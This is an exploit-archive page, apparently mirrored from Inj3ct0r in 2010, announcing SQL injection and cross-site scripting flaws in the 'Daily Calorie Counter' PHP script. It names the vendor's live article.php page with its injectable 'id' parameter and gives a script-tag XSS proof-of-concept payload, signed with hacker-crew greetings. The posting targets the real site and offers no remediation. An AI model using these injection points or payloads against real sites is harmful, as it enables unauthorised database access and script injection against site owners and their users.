Home / os / win7

Daily Calorie Counter SQL Injection Vulnerability

Posted on 10 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Daily Calorie Counter SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================
Daily Calorie Counter SQL Injection Vulnerability
=================================================


Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Daily Calorie Counter SQL Injection Vulnerability
Vendor url:http://www.fullhealth.net/
Version:1.0
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members.
Spl Greetz to:inj3ct0r.com Team

#####################################################################################################################################################################################################

Description:

You could simply add Daily Calorie Counter php script into your web page. No php
skills needed. No mysql or any other database. There are oer 200 activities included, and also you could add new activities. Also it is completely free.

#######################################################################################################################################################################################################

Vulnerability:

*SQLi Vulnerability

DEMO URL :http://www.fullhealth.net/article.php?id=[sqli]

*XSS Vulnerability

Parameter:'&quot;--&gt;&lt;script&gt;alert(0x000872)&lt;/script&gt;

DEMO URL:ttp://www.fullhealth.net/article.php?id=[xss]

# 0day n0 m0re #

-- 
With R3gards,
L0rd CrusAd3r


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :